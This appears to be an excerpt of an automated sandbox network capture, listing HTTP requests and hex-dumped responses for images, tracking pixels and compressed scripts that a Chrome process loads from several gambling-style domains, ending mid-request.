                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Via: LA-MEX-queretaro-EDGE2-CACHE2[713],LA-MEX-queretaro-EDGE2-CACHE1[470,TCP_MISS,711],LA-MEX-mexicocity-GLOBAL1-CACHE33[434],LA-MEX-mexicocity-GLOBAL1-CACHE25[206,TCP_MISS,431],1.1 google
                                                                                                                                                          X-CCDN-Origin-Time: 203
                                                                                                                                                          x-hcs-proxy-type: 0
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b43b94d892ceaae6fd1a7250de028cb0
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:41:08 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          305192.168.2.550059101.33.24.114434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC551OUTGET /cc.png?r=5294706042 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://js326.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC340INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 6875245494502081629
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          306192.168.2.55006154.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC553OUTGET /cc.png?r=2654442886 HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC341INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 18128291094264408164
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          307192.168.2.55006890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC652OUTGET /pc/image-pc/index/383/menu/menubg.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 2606
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:20 GMT
                                                                                                                                                          ETag: "64bf926c-a2e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE11[3],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467550
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3b58facc388bc61f36ea95a2c667354b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124450
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC2606INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 0a 07 07 09 07 06 0a 09 08 09 0b 0b 0a 0c 0f 19 10 0f 0e 0e 0f 1e 16 17 12 19 24 20 26 25 23 20 23 22 28 2d 39 30 28 2a 36 2b 22 23 32 44 32 36 3b 3d 40 40 40 26 30 46 4b 45 3e 4a 39 3f 40 3d ff db 00 43 01 0b 0b 0b 0f 0d 0f 1d 10 10 1d 3d 29 23 29 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d ff c2 00 11 08 00 90 07 80 03 01 11 00 02 11 01 03 11 01 ff c4 00 17 00 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 02 07 ff c4 00 16 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 03 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e5 f9 ec 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii: JFIFC$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=C=)#)==================================================


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          308192.168.2.55006990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC645OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC625INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE2[9],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,7],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 0025e446c41d81b201fe988c5fedc997
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC15759INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:08 UTC2119INData Raw: 2e ec fa e7 a7 b7 99 e3 23 8b cb 07 90 89 8c 89 3a 4b 33 3e 0e 47 2c 75 00 ca 3a 3b d4 8c e3 10 1e 2d 0f 96 24 c6 51 00 6a 0e f9 62 c0 91 9e 06 24 ba b0 72 1c e3 89 7c 8a 78 e3 f1 7b 1c 6f e8 3c 6e 3a e4 70 17 b8 1b 2b 7b 89 26 98 31 b9 9c 41 65 71 6c c9 ee 39 dd b5 2e 82 33 00 49 06 a3 56 ac ec 7c b8 4c 9f 1c bf 51 2c 38 07 90 97 bf 43 ab b5 ae e8 d6 94 06 91 a2 3f a0 0c 78 96 89 19 f2 d4 ca 5d 90 ff 00 90 70 4d 98 92 fa d3 07 9a 9b 1b 6e 0f ea 38 e6 ce e5 f1 b7 5f 77 5a 97 31 c1 7d 24 36 d1 54 90 21 09 22 8d bb 44 8d 5f 44 70 f4 f1 8d 3d 26 51 7e 07 44 24 1b db 10 64 7f 53 c4 f4 e7 a1 2d ee 3e 63 88 c9 bf aa 71 2f ec 91 11 1f a5 8f 6f 2a bb 39 c9 78 5e 5b 99 e5 79 5d d5 9e 43 23 8f 94 b5 ed 96 0d 44 f6 b0 dd e4 24 99 a5 73 78 25 c8 de 98 d3 d5 ea 11 1a
                                                                                                                                                          Data Ascii: .#:K3>G,u:;-$Qjb$r|x{o<n:p+{&1Aeql9.3IV|LQ,8C?x]pMn8_wZ1}$6T!"D_Dp=&Q~D$dS->cq/o*9x^[y]C#D$sx%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          309192.168.2.55007090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC641OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:08 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d69"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE11[21],EU-GER-frankfurt-GLOBAL1-CACHE12[0,TCP_HIT,19],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826101
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b098337bf044211a61a90041ab2da23b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:08 UTC15721INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          310192.168.2.550064183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC552OUTGET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC709INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 5007
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-212-01
                                                                                                                                                          ETag: W/"5d848f4f-4ea4"
                                                                                                                                                          Date: Thu, 06 Jun 2024 18:42:31 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sat, 06 Jul 2024 18:42:31 GMT
                                                                                                                                                          Age: 273517
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-204
                                                                                                                                                          x-link-via: dgct63:443;xymp212:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-212-01
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-11
                                                                                                                                                          X-Cdn-Request-ID: 7018c7ee674bd0ef05b9b44d6d059e1d
                                                                                                                                                          2024-06-09 22:41:08 UTC5007INData Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 3c 0d 73 db 36 b2 7f c5 e1 74 7c e4 85 62 9c a4 f7 31 52 99 8e 63 3b a9 a7 89 9d 67 bb d7 eb 39 9a 0c 25 82 14 6d 8a d4 91 54 12 9f c2 ff fe 76 f1 45 00 04 25 a5 cd 7b 6f 5e a7 e3 48 c0 2e b0 d8 2f ec 2e 00 b9 c9 ba 98 37 59 59 b8 91 3f f3 36 59 e2 36 0f 2b 52 26 07 cb 32 5e e7 e4 51 18 3a eb 22 26 49 56 90 d8 39 3c 64 ad 01 f9 bc 2a ab a6 f6 36 fa f7 70 e6 56 e4 df eb ac 22 ae 73 f7 ef 35 a9 1e 1c cf 8d 3c af 25 79 4d 94 b1 d9 78 21 8c 2d 66 87 a1 59 63 10 2d 63 6f c3 3e bb ce ac 2c 9b ba a9 a2 d5 28 ce a2 bc 4c 1d ff 56 0c 3c f5 25 e5 73 6f 53 91 66 5d 15 07 33 f8 dc f2 e9 a2 e0 a5 c0 3e a5 c8 40 5d 14 dc fd 17 62 7b 6d db ba cd 22 ab bb 41 60 d6 8f 51 75 30 0b e3 20 29 02 58 57 94 07 27 65 01 f8 eb 79 53 56 13 ec 9c 87
                                                                                                                                                          Data Ascii: <s6t|b1Rc;g9%mTvE%{o^H./.7YY?6Y6+R&2^Q:"&IV9<d*6pV"s5<%yMx!-fYc-co>,(LV<%soSf]3>@]b{m"A`Qu0 )XW'eySV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          311192.168.2.550065183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC537OUTGET /ftl/commonPage/js/layer.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:08 UTC706INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 7599
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-XY-MP-02-08
                                                                                                                                                          ETag: W/"5d848f4f-55f6"
                                                                                                                                                          Date: Fri, 07 Jun 2024 08:57:54 GMT
                                                                                                                                                          Last-Modified: Fri, 20 Sep 2019 08:35:27 GMT
                                                                                                                                                          Expires: Sun, 07 Jul 2024 08:57:54 GMT
                                                                                                                                                          Age: 222194
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: HIT
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;xymp02:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-XY-MP-02-08
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-32
                                                                                                                                                          X-Cdn-Request-ID: 383820d4a0fcf35701cb3003e86a87fc
                                                                                                                                                          2024-06-09 22:41:08 UTC7599INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 3c ed 6e e3 48 72 ff f3 14 32 ef 22 93 2b 8a a6 64 8f 3d 43 99 16 66 66 67 92 01 66 73 97 db 41 ee 16 5a 05 a0 a9 96 c5 1d 8a d4 91 2d cf 78 2d fd 49 f2 28 79 81 00 41 80 e0 02 e4 65 72 48 1e 23 55 d5 1f ec a6 28 cf ee 26 30 60 b1 3f d8 5d 5d df 55 dd cd b3 af 4e 7a 79 f2 c0 aa e1 fd 79 30 0a c2 de ef d9 ed 9f ff e3 df ff fc 2f ff f0 df 7f fa a7 ff fa d3 bf f5 be 79 f7 a1 f7 3e 4b 59 51 b3 5e 6f c5 f9 26 3a 3b a3 17 02 f8 bf cd 82 b4 5c 9f f5 7a af 1e 7a ff f3 af ff fc e7 ff fc c7 de 57 67 7f d1 9b 9c 2c b7 45 ca b3 b2 70 99 cf bd 47 67 0b 2f d7 bc ca 52 ee 4c ee 93 aa 97 f9 85 9f c4 4c 0c d1 ef 8b 91 16 6c 99 15 cc 2f e3 c7 3b c6 7f 9b f0 55 a4 47 f1 1e f1 2d 16 2f ca 74 bb 66 05 0f ea b4 ca 36 bc f6 79 cc 66 30 0c 2b ee
                                                                                                                                                          Data Ascii: <nHr2"+d=CffgfsAZ-x-I(yAerH#U(&0`?]]UNzyy0/y>KYQ^o&:;\zzWg,EpGg/RLLl/;UG-/tf6yf0+


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          312192.168.2.550066183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:08 UTC559OUTGET /ftl/commonPage/js/jquery/jquery.super-marquee.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
